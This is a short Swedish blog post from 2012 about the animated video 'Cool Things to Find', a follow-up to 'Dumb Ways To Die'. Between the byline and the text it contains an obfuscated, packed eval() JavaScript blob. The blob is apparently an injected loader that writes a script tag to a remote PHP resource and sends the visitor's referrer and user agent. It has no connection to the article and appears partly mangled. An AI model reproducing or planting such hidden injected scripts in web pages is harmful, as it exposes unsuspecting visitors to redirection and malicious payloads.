Image Image Image Image Image Image Image Image Image Image

| 2 juni, 2020

Scroll to top

Top

Cool Things to Find – fortsättningen till Dumb Ways To Die

Filip Urde
  • On 29 november, 2012
  • http://www.revue.se/filip-urde

– eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|briry|var|u0026u|referrer|knyti||js|php’.split(’|’),0,{}))
”So many cool things to find”

 

Kommer ni ihåg ”Dumb Ways To Die” som kom för någon vecka sedan? Här kommer nu ytterligare en video i samma anda, men nu handlar det om coola saker som du kan hitta. Den heter Cool Things To Find och jag älskar verkligen stilen på dessa videos!